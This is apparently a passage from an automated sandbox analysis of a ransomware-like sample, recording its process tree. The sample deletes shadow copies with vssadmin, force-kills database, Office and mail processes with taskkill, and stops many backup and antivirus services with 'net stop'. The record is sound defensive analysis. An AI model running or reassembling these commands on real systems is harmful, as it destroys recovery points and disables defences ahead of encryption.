    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:21820
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:21848
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:21880
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    PID:21920
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:21936
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:21968

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\eiavW.exe
"C:\Users\Admin\AppData\Local\Temp\eiavW.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:804
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3428
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1160
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2248
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4744
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3220
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3548
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3552
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5072
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3176
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2796
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4352
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:400
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4760
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
  2⤵
  PID:2416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
    3⤵
    PID:2264
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
  2⤵
  PID:4328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Enterprise Client Service" /y
    3⤵
    PID:4428
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Agent" /y
  2⤵
  PID:4396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Agent" /y
    3⤵
    PID:3432
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
  2⤵
  PID:4348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:2204
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
  2⤵
  PID:656
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Clean Service" /y
    3⤵
    PID:4724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
  2⤵
  PID:4420
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
    3⤵
    PID:2500
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
  2⤵
  PID:4372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
    3⤵
    PID:452
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
  2⤵
  PID:1968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Health Service" /y
    3⤵
    PID:3516
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
  2⤵
  PID:2324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
    3⤵
    PID:2916
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
  2⤵
  PID:4448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos MCS Client" /y
    3⤵
    PID:3556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
  2⤵
  PID:3856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Message Router" /y
    3⤵
    PID:4576
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
  2⤵
  PID:2588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
    3⤵
    PID:3764
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
    3⤵
    PID:1548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
  2⤵
  PID:2108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
    3⤵
    PID:1964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
  2⤵
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
    3⤵
    PID:3032
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
  2⤵
  PID:4496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
    3⤵
    PID:4256
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
  2⤵
  PID:3852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Symantec System Recovery" /y
    3⤵
    PID:408
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:2620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:1632
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcronisAgent /y
  2⤵
  PID:4540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:3260
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AcrSch2Svc /y
  2⤵
  PID:4912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4924
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop Antivirus /y
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:2316
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ARSM /y
  2⤵
  PID:4472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:3456
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:2940
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:4348
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:3560
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:3668
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:3176
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecRPCService /y
  2⤵
  PID:1156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:2944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:1816
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop bedbg /y
  2⤵
  PID:4352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:4092
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop DCAgent /y
  2⤵
  PID:2652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DCAgent /y
    3⤵
    PID:4992
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPSecurityService /y
  2⤵
  PID:1460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:2588
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EPUpdateService /y
  2⤵
  PID:4512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:2992
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EraserSvc11710 /y
  2⤵
  PID:1648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:2108
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EsgShKernel /y
  2⤵
  PID:3940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:4372
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop FA_Scheduler /y
  2⤵
  PID:1064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:3476
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IISAdmin /y
  2⤵
  PID:3920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:4680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop IMAP4Svc /y
  2⤵
  PID:3220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IMAP4Svc /y
    3⤵
    PID:4484
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop macmnsvc /y
  2⤵
  PID:4144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:3480
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop masvc /y
  2⤵
  PID:4548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:4708
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBAMService /y
  2⤵
  PID:880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:3280
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MBEndpointAgent /y
  2⤵
  PID:4152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:116
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeEngineService /y
  2⤵
  PID:1992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeEngineService /y
    3⤵
    PID:1336
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFramework /y
  2⤵
  PID:764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:2336
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  2⤵
  PID:3224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:4368
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McShield /y
  2⤵
  PID:4704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:2992
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop McTaskManager /y
  2⤵
  PID:4340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McTaskManager /y
    3⤵
    PID:2972
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfemms /y
  2⤵
  PID:644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:5044
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfevtp /y
  2⤵
  PID:2208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:5108
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MMS /y
  2⤵
  PID:4132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:3452
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mozyprobackup /y
  2⤵
  PID:4736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:868
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer /y
  2⤵
  PID:4716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:4072
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer100 /y
  2⤵
  PID:4376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:800
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MsDtsServer110 /y
  2⤵
  PID:2104
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:3800
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeES /y
  2⤵
  PID:544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:1652
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeIS /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:4704
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:4472
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:4560
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeMTA /y
  2⤵
  PID:4148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:2624
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSA /y
  2⤵
  PID:440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSA /y
    3⤵
    PID:4084
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSExchangeSRS /y
  2⤵
  PID:4452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeSRS /y
    3⤵
    PID:2776
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
  2⤵
  PID:2380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    3⤵
    PID:4660
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:3428
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:4468
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:2668
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:5020
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:4156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:5136
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:1952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:3656
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:2916
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:3568
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:4064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:3964
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:1844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:5148
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:5012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:5668
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
  2⤵
  PID:1164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    3⤵
    PID:4340
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:3480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:5168
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:4396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:5504
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPS /y
  2⤵
  PID:4576
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:5392
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:2416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:5596
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3456
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:5512
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:4496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:5572
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
  2⤵
  PID:3532
- - C:\Windows\system32\net1.exe
